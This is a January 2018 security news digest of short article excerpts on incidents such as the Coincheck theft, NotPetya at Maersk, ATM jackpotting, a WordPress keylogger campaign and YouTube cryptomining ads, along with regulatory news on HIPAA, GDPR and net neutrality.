IT Security News Blast 01-29-2018

Maersk Hack

Hacked Japanese cryptocurrency exchange to repay owners $425 million
That amounts to nearly 90 percent of the 58 billion yen worth of NEM coins the company lost in an attack that forced it to suspend on Friday withdrawals of all cryptocurrencies except bitcoin. Coincheck said in a statement it would repay the roughly 260,000 owners of NEM coins in Japanese yen, though it was still working on timing and method.

NotPetya attack totally destroyed Maersk’s computer network: Chairman
Maersk Chairman Jim Hagemann Snabe said while participating on a cybersecurity panel at the conference that his company replaced 45,000 PCs, 4,000 servers and install 2,500 applications. The computer system runs an operation where a ship carrying 20,000 containers enters a port every 15 minutes somewhere around the world. Overall, Maersk handles 20 percent of all world trade, he said. “We found we had to reinstall our entire infrastructure. It was done in a heroic effort in just 10 days,” he said, adding such a job should take about six months to complete.

First ‘Jackpotting’ Attacks Hit U.S. ATMs
On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States. “While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”

7 breach notification processes that must be followed
The breach notification rule requiring HIPAA-covered entities and their business associates to provide public notification following a breach of unsecured protected health information has been around since 2009. But with the industry besieged with ransomware and warnings that it will increasingly get worse during 2018, it’s time for a refresher course on complying with the rule’s provisions, courtesy of guidance from the Department of Health and Human Services, which enforces the rule.

UK Government warns energy, health and water brands to prepare for cyber attacks or face fines
Under the new system any cyber breaches and IT failures will have to be reported to the regulator who will assess whether appropriate security measures were in place. The regulator will have the power to issue legally-binding instructions to improve security, and – if appropriate – impose financial penalties. The National Cyber Security Centre (NCSC) has today published detailed guidance to help organisations comply, which is based around 14 key principles.

EC issues GDPR guidance
Noting that “no entity in the privacy and data protection universe – from national regulator to the smallest data processor – will be unaffected by the GDPR and the Commission is doing everything in its power to ensure no one is caught unawares,” Pfeife said, the guidance “also implies, however, that there will be an expectation of compliance on day one and ignorance will not be a defense.”

National security threats in year one of Trump administration: Cyber security, lone wolves
“The United States worries about the destructive attack…it’s the attack that corrupts a hard drive and literally destroys it and destroys the data,” said Townsend, pointing to the cyberattacks carried out in the Middle East and on Sony Corporation by the North Koreans. She adds, however, that “influence operations” that mirror that of Russia’s meddling or influence in the 2016 election pose a “real threat” to the U.S.

Candid camera: Dutch hacked Russians hacking DNC, including security cameras
AIVD’s intrusion into the network gave them access to computers used by the group behind Cozy Bear and to the closed-circuit television cameras that watched over them, allowing them to literally witness everything that took place in the building near Red Square, according to the report. […] The information gathered during the surveillance, Modderkolk’s sources suggested, was key to the US intelligence agencies’ attribution of the DNC breach to Russia. And the leaks that have followed, as well as the Trump administration’s recalcitrance in accepting the attribution, have made the Dutch intelligence community a “lot more cautious when it comes to sharing intelligence,” Modderkolk wrote.

Terabit Army: China Squares up on the Battlefield of Information
The result was the “informationization” of warfare, where information is applied to all aspects of warfare. This included not just weapons, but logistics, personnel selection and management, and decision-making. “Information dominance,” in this context, entails the ability to collect more information, manage it better, transmit it faster, and employ it more precisely and more accurately than the adversary.

U.S. ingenuity created the Internet; can it keep it safe and secure?
This integrated Chinese approach to cyber, economic and military power demands that we come up with a creative and strategic response of our own. The United States cannot and should not mirror China’s centralized model. China is an autocratic society in which the government can centrally plan and implement a unified approach. In contrast, our free and open system, while less directed, fosters innovation and creativity. This is a feature, not a bug.

North Korea tells Theresa May to ‘mind her own business’ as it issues stark cyber warning
Kim Jong-un’s media mouthpiece, KCNA, delivered the warning after declaring “it doesn’t make sense” to place the blame of the WannaCry hack. It said: “The US and its followers such as Britain had better mind their own businesses rather than provoking other countries over cyber attack. […] The North Korean regime then launched a scathing attack on the US for “misleading the public” and linking devastating hacks to Kim Jong-un on “no grounds”.

Stopping the Next Cyber Conflict
Governments must begin to hold cyber adversaries to account. In the absence of effective deterrence, governments are, in effect, encouraging more innovation and boldness by our enemies. The good news is that attribution – identifying who is responsible – is now largely a solved problem. Capabilities of both governments and private sector have improved; both are now competent at the swift identification of perpetrators of most intrusions, as evidenced by the fact that nearly every significant cyberattack in recent years has been attributed.

Montana to FCC: You can’t stop us from protecting net neutrality
The FCC’s repeal of net neutrality rules attempts to preempt states and localities from issuing their own similar rules. But Bullock’s executive order doesn’t directly require ISPs to follow net neutrality rules. Instead, ISPs that accept contracts to provide Internet service to any state agency must agree to abide by net neutrality principles throughout the state. Bullock’s fact sheet is titled, “Why Isn’t Montana’s Executive Order Preempted?” and it offers numerous answers to that question.

Microsoft works weekends to kill Intel’s shoddy Spectre patch
Microsoft has implemented Intel’s advice to reverse the Spectre variant 2 microcode patches. Redmond issued a rare weekend out-of-cycle advisory on Saturday here, to make the unwind possible. Intel’s first patch was so bad, it made many computers less stable, sending Linus Torvalds into a justifiable meltdown last week. Chipzilla later withdrew the patch, but it had made its way into a Microsoft fix, which the company pulled on Saturday.

Keylogger Campaign Returns, Infecting 2,000 WordPress Sites
Attackers use injection scrips on WordPress sites with weak or outdated security. “The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file,” Sinegubko wrote. Attackers target both the admin login page and the site’s public facing frontend. HTLM is obfuscated to include JavaScript code, such as “googleanalytics.js”, that load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

Baby boomers more cybersecurity savvy than Gen-Z, study
Baby boomers were also the least likely to spread malware and other cyber threats as 94.2 percent said they had not forwarded emails from unknown senders within the past year. Millennials fared in between the two with only 34.2 percent accurately defining ransomware. The study also found the “selfie generation” were most concerned about losing personal photos in a cyberattack were millennials as they comprise 28.9 percent of respondents afraid of a photo leak.

Now even YouTube serves ads with CPU-draining cryptocurrency miners
The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that’s controversial because it allows subscribers to profit by surreptitiously using other people’s computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes.

Lenovo Fixes Hardcoded Password Flaw Impacting ThinkPad Fingerprint Scanners
“Sensitive data stored by Lenovo Fingerprint Manager Pro, version 8.01.86 and earlier, including users’ Windows logon credentials and fingerprint data, is encrypted using a weak algorithm, contains a hard-coded password, and is accessible to all users with local non-administrative access to the system in which it is installed,” according to Mitre’s Common Vulnerabilities and Exposures description of the vulnerability (CVE-2017-3762).

Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.